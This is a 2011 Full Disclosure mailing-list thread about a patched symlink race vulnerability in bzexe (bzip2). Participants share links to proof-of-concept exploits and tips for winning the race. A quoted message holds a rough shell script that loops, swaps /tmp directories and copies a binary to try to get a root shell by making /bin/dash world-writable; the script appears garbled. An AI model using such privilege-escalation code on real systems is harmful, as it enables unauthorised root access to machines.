Full Disclosure: Re: Symlink vulnerabilities

[xD 0x41 <secn3t () gmail com>]

Nice :)
I have put a post about this whole thread on www.crazycoders.com ,
will add this and props for those involved now :)
thx to you, bugs and for others who were involved, also realise that i
have now found that bzexe = bzip2 src code, so looking on
debian/ubuntu and centos, there is a bzexe or bzip2 on every box,...
luckily this issue is patched for both bzip2 and bzexe but know that
it is even still being tested now against bunzip2 , on decompressions,
but has not been done, only know that the src is same as bzip2
executable binary (linux), again, thx to everyone involved, it got
patched within a day wich is what was the aim... Ubuntu is alittle
safer ;s
cheers.
xd


On 7 November 2011 03:54, vladz <vladz () devzero fr> wrote:
> Hi!
>
> It's raining here, so I finally wrote a PoC for the bzexe issue:
>
>  http://vladz.devzero.fr/other/bzexe_PoC.c.html
>
> It always succeed on my Dual-core.
>
> Cheers,
> vladz.
>
>
> On Fri, Oct 28, 2011 at 11:43:56AM +1100, xD 0x41 wrote:
> > I just did a quick write of it , i think this is right anyhow.. i aint
> > the greatest of bash/exploit coders in bash but i did try, and, i
> > kinda had it almost same, but for one line, the while.. i guess that
> > does it, well. here is an example i guess, if we wee to use gcc and
> > make a binary called 'bad' properly.. i assume this would be the
> > way... 8
> >
> >
> > #!/bin/sh
> > cd /tmp
> > cat > /tmp/bad.c << EOF
> > chmod 777 /bin/dash
> > EOF
> > gcc /tmp/bad.c -o /tmp/bad
> > while (true) do ./bz.sh ; done
> > #!/bin/bash
> > if [ -a /tmp/bash/gztmp* ]
> > then
> > echo "[+] Exploting .."
> > mv /tmp/bash /tmp/bash.dir
> > cp /tmp/bad /tmp/dash
> > echo "[!] Got dash rootshell in: /tmp/dash .."
> > ./dash
> > ls -l /tmp/dash
> > while (true) do ./bz.sh ; done
> > whoami
> > id
> > su
> > fi
> >
> > I think this would be kinda close ?
> > I dont expect this togo onto public domain ATALL, so please, Ill
> > respect your privacy but, you also respect mine ok :)
> > I like you, your a great guy, and, awesome for taking the challenge,
> > where even the striongest, like taviso, and kcope even, left in your
> > wake... and even i am abit shocked but, am going to try and, put it
> > into practice,... the .c bzexe doesnt really do it for me :P but yes,
> > i did change it alittle so it atleast echoes across a tmp bin/sh or,
> > so i think it needs.. then again, it might not need anything, ut, i
> > know these pocs wont get people a rootshell unless we show them, so, i
> > guess aslong as these kinda emails stay pvt, its all good.
> > i have alot fo bugs in the bash area, and i discuss alot with some
> > members of the list even ojn my irc channel on efnet #haxnet , and,
> > there is ALL the exploit coders from FD probably, phrack and more
> > gropups,core,kcope,and rapid7,all them other smaller secteams seem to
> > lurk also, from a 3 user channel about 1 year ago, simply speaking
> > about PoCs made and theyre worth.
> > I guess it is good to see and then to prioritise, as debian have done
> > now, with the bzexe :)
> > See, it would have probably rmained nothing done for god knows, if you
> > had not taken the challenge up, and, i cant believe you did it with a
> > shitty 500mhz! LOL, i am loooking at about 4 of those atm on my floor,
> > i did a tradein offer, p3 for p4 for 50bux, and , i was after that
> > exact celeron and pentium 500mhz p3 cores, theyre very good when
> > played with and, my gears all rack.
> > Anyhow, i would love to chat with you, you use irc >?
> > if so, id love to catchup and have a chat anytime :)
> > If your in Australia, well heck come over for a coffee buddy!
> > have a greeat day, and, if you can fix this to make a rootshell, well,
> > it shuld make it anyhow but, just incase, i guess this is my own
> > collection, and, i have like 6 sh files, wich between them, get all
> > 2011 and earlier, and it is really scary because, there is NO way to
> > expoit them , if using .c ... Anyhow, thankyou, very much, and, i and
> > the secworld owe you a big thanks :)
> > I only wish they credited ppl like me, who try to inpire...lol, i
> > guess i am like one of those dodgy football managers who sleeps with
> > pros and swtuff... hehe... kept in the back... for ther sake of
> > sanity.
> > lol... hjave a good one mate!
> > xd / crazycoders.com ( i will soon make an article and a compete patch
> > solution etc, when it has a patch availabale, ofcourse then
> >
> > PS: i will post it in one big PoC details with solution and patch
> > attached to the posting etc...i dont like to pulish things wich are
> > not atleast being patched.... so, i guess, enjoy!
> >
> >
> >
> >
> >
> > On 28 October 2011 04:34, vladz <vladz () devzero fr> wrote:
> > > On Thu, Oct 27, 2011 at 05:01:30PM +0200, Benjamin Renaut wrote:
> > > > http://pastebin.com/FaaEsXRW
> > > Nice thing, but for sure, it can be optimized.
> > >
> > > For example, to save time, I would suggest you to use rename() instead
> > > of using both unlink() and rmdir() functions.  Same thing for your
> > > write_shellcode() function, it contains too much calls.  It would be
> > > preferable to create your nasty shell script first, and then (when it's
> > > time), rename() it as dirname.
> > >
> > > Cheers,
> > > --
> > > http://vladz.devzero.fr
> > > PGP key 8F7E2D3C from pgp.mit.edu
> > >
> > > _______________________________________________
> > > Full-Disclosure - We believe in it.
> > > Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> > > Hosted and sponsored by Secunia - http://secunia.com/
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/